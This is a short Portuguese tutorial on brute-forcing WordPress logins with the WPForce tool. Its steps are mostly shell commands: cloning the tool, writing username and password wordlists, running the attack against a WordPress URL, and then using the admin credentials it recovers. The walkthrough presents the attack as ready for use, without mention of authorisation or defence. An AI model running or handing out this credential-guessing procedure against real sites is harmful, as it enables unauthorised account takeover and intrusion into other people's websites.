WPForce é uma ferramenta desenvolvida em Python para realizar o ataque de BruteForce no WordPress, mais uma das inúmeras formas de se fazer isso.

Projeto: github.com/n00py/WPForce

01 Passo

Realize o download do WPForce e lista o conteúdo do diretório

[email protected]:/# git clone https://github.com/n00py/WPForce

[email protected]:/# cd WPForce

[email protected]:/WPForce# ls -l

02 Passo

Utilize sua WordList! Para este exemplo vou criar os arquivos usuarios.txt e senhas.txt

[email protected]:/WPForce# echo “admin” > usuarios.txt

[email protected]:/WPForce# echo “[email protected]” > senhas.txt

[email protected]:/WPForce# ls -l

03 Passo

Execute o WPForce para realizar o ataque!

[email protected]:/WPForce# python wpforce.py -i usuarios.txt -w senhas.txt -u “http://192.168.1.210/wordpress/”

04 Passo

Utilize os dados encontrados!

Usuário: admin | Senha: [email protected]